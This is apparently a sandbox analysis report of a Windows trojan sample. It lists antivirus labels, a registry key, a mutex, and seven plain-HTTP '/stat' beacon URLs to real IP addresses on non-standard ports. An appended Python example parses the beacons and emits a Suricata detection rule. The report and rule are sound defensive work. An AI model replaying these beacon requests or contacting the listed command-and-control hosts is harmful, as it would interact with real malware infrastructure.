Analysis Date: 2015-09-19 10:00:32
MD5: 3b2486e228f5db6cad7b78194c443d54
SHA1: 01e1daaa79a572645f48af096eeb315e8811188e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
PEhash: 3c2dc10e4926deac196afcdd9795d6a674a708fa
IMPhash: d5457eeea56d0c64e40250d044842848
AV results, 24 of 31 engines flag the sample (vendor: detection name):

CA (E-Trust Ino): no_virus
F-Secure: Gen:Variant.Graftor.234950
Dr. Web: BackDoor.Siggen.59488
ClamAV: no_virus
Arcabit (arcavir): Gen:Variant.Graftor.234950
BullGuard: Gen:Variant.Graftor.234950
Padvish: no_virus
VirusBlokAda (vba32): TrojanProxy.Glupteba
CAT (quickheal): no_virus
Trend Micro: no_virus
Kaspersky: Trojan.Win32.Generic
Zillya!: Trojan.Glupteba.Win32.2843
Emsisoft: Gen:Variant.Graftor.234950
Ikarus: Trojan.Win32.Injector
Frisk (f-prot): no_virus
Authentium: W32/Trojan.DQBU-7192
MalwareBytes: Trojan.Bunitu
MicroWorld (escan): Gen:Variant.Graftor.234950
Microsoft Security Essentials: Trojan:Win32/Carberp!rfn
K7: Trojan ( 004cb6451 )
BitDefender: Gen:Variant.Graftor.234950
Fortinet: W32/Injector.CGIW!tr
Symantec: Trojan.Gen.2
Grisoft (avg): Inject3.LS
Eset (nod32): Win32/Injector.CGGL
Alwil (avast): Win32:Malware-gen
Ad-Aware: Gen:Variant.Graftor.234950
Twister: Trojan.Injector.CGGL.nbcc
Avira (antivir): TR/Inject.sbbeipj
Mcafee: RDN/Generic.bfr
Rising: no_virus

Most labels are generic (Graftor, Injector, Generic); the family names that do appear (Glupteba, Bunitu, Carberp) disagree, so the vendor names should not be taken as a family attribution on their own.

Runtime Details:

Screenshot

Process tree:
↳ C:\malware.exe
    Creates Process: C:\malware.exe
    ↳ C:\malware.exe

The report records only that the first instance spawns a second instance of the same binary; it does not show what the child instance does.

Registry: HKEY_CURRENT_USER\SOFTWARE\NVIDIA Corporation\Global\nvUpdSrv\value ➝ 21150727\x00
(the stored value is the same string the beacon below sends as version= and comment=; the key is placed under a vendor name the sample has no relation to, so its presence on a host is a usable indicator)
Creates File: \Device\Afd\Endpoint
(the Winsock AFD endpoint opened whenever a socket is created; this is a network artifact, not a file dropped on disk)
Creates Mutex: Global\MD7H82HHF7EH2D73

Network Details:

HTTP GET requests (all sent with an empty User-Agent header):

http://87.117.252.192:51964/stat?uid=100&downlink=1111&uplink=1111&id=001AA23C&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
http://108.162.200.153:17513/stat?uid=100&downlink=1111&uplink=1111&id=001AB651&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
http://82.211.20.226:54127/stat?uid=100&downlink=1111&uplink=1111&id=001AC9E9&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
http://195.191.25.8:40406/stat?uid=100&downlink=1111&uplink=1111&id=001ADD80&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
http://89.19.20.202:36102/stat?uid=100&downlink=1111&uplink=1111&id=001AF118&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
http://202.158.49.22:12410/stat?uid=100&downlink=1111&uplink=1111&id=001B04AF&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=
http://87.117.252.192:51964/stat?uid=100&downlink=1111&uplink=1111&id=001B1847&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s=

Across the seven requests, uid=100, statpass=bpass, version=21150727, comment=21150727, features=30 and the guid 39209af3-a969-44a7-8f04-55ad89589a26 are constant; only id changes, and it increases with each request (001AA23C, 001AB651, 001AC9E9, 001ADD80, 001AF118, 001B04AF, 001B1847). Six distinct endpoints are contacted, each on a high non-standard TCP port, and 87.117.252.192:51964 is contacted twice. Because the beacons are plain HTTP on ports such as 51964 and 17513 rather than 80 or 443, a web-proxy log that only covers the standard ports may never see them; flow records or a full packet capture are needed to catch this traffic.

TCP flows (192.168.1.1 is the analysis host; one ephemeral source port per request):

192.168.1.1:1031 ➝ 87.117.252.192:51964
192.168.1.1:1032 ➝ 108.162.200.153:17513
192.168.1.1:1033 ➝ 82.211.20.226:54127
192.168.1.1:1034 ➝ 195.191.25.8:40406
192.168.1.1:1035 ➝ 89.19.20.202:36102
192.168.1.1:1036 ➝ 202.158.49.22:12410
192.168.1.1:1037 ➝ 87.117.252.192:51964
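The following is an added example, not part of the sandbox report or any vendor tooling. It takes the seven beacon requests listed above (embedded as a constructed log excerpt, one "GET <url> ua=..." record per line, plus one constructed benign line that must not match), checks each against the beacon shape (path /stat, the full parameter set, statpass=bpass, empty User-Agent), reduces the matches to exportable indicators, and emits a Suricata rule keyed on the observed guid. The log-line format, the function names and the rule's msg/sid are assumptions made for this example; the rule syntax targets Suricata 5+ sticky buffers and has not been run against a live sensor.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed log excerpt: the seven requests from the report, one per line as
# "GET <url> ua=<user-agent>", plus one constructed benign line as a control.
SAMPLE_LOG = """\
GET http://87.117.252.192:51964/stat?uid=100&downlink=1111&uplink=1111&id=001AA23C&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://108.162.200.153:17513/stat?uid=100&downlink=1111&uplink=1111&id=001AB651&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://82.211.20.226:54127/stat?uid=100&downlink=1111&uplink=1111&id=001AC9E9&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://195.191.25.8:40406/stat?uid=100&downlink=1111&uplink=1111&id=001ADD80&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://89.19.20.202:36102/stat?uid=100&downlink=1111&uplink=1111&id=001AF118&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://202.158.49.22:12410/stat?uid=100&downlink=1111&uplink=1111&id=001B04AF&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://87.117.252.192:51964/stat?uid=100&downlink=1111&uplink=1111&id=001B1847&statpass=bpass&version=21150727&features=30&guid=39209af3-a969-44a7-8f04-55ad89589a26&comment=21150727&p=0&s= ua=""
GET http://stats.example.invalid/stat?uid=7&version=2 ua="Mozilla/5.0"
"""

LINE_RE = re.compile(r'^GET (\S+) ua="(.*)"$')

# Query keys every beacon in the report carries; all must be present to match.
BEACON_KEYS = {"uid", "downlink", "uplink", "id", "statpass", "version",
               "features", "guid", "comment", "p", "s"}


def parse_line(line):
    """Return (url, user_agent) for one log record, or None if it is not a GET."""
    m = LINE_RE.match(line.strip())
    return (m.group(1), m.group(2)) if m else None


def beacon_fields(url, user_agent):
    """Return the beacon's fields if the request matches the beacon shape, else None.

    Shape: path /stat, all BEACON_KEYS present, statpass=bpass, empty User-Agent.
    """
    parts = urlsplit(url)
    if parts.path != "/stat" or user_agent != "":
        return None
    q = parse_qs(parts.query, keep_blank_values=True)
    if not BEACON_KEYS.issubset(q):
        return None
    if q["statpass"] != ["bpass"]:
        return None
    endpoint = f"{parts.hostname}:{parts.port}" if parts.port else parts.hostname
    return {"endpoint": endpoint, **{k: v[0] for k, v in q.items()}}


def extract_iocs(log_text):
    """Reduce a log excerpt to the indicators worth exporting."""
    beacons = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        fields = beacon_fields(*rec)
        if fields:
            beacons.append(fields)
    return {
        "beacon_count": len(beacons),
        "endpoints": sorted({b["endpoint"] for b in beacons}),
        "endpoint_hits": Counter(b["endpoint"] for b in beacons),
        "guids": {b["guid"] for b in beacons},
        "versions": {b["version"] for b in beacons},
        "ids": [b["id"] for b in beacons],
    }


def suricata_rule(guid, sid=1000001):
    """Build a Suricata rule keyed on the /stat beacon and the observed guid.

    Assumption: Suricata 5+ sticky-buffer syntax; msg and sid are placeholders.
    """
    return (
        'alert http $HOME_NET any -> $EXTERNAL_NET any '
        '(msg:"Bot stat beacon, guid {g}"; flow:established,to_server; '
        'http.method; content:"GET"; '
        'http.uri; content:"/stat?"; startswith; '
        'content:"statpass=bpass"; content:"guid={g}"; '
        'classtype:trojan-activity; sid:{sid}; rev:1;)'
    ).format(g=guid, sid=sid)


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_LOG)
    print("beacons matched:", iocs["beacon_count"])
    for ep, n in iocs["endpoint_hits"].most_common():
        print(f"  {ep}  ({n} request(s))")
    print("guid(s):", ", ".join(sorted(iocs["guids"])))
    print("version(s):", ", ".join(sorted(iocs["versions"])))
    for g in sorted(iocs["guids"]):
        print(suricata_rule(g))
```

The shape check deliberately keys on the full parameter set and the empty User-Agent rather than on the IP addresses, so the same function still matches if the sample is pointed at fresh C2 endpoints; the address list it produces is what goes to a blocklist, and the rule is what goes to the sensor.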

Raw Pcap

Strings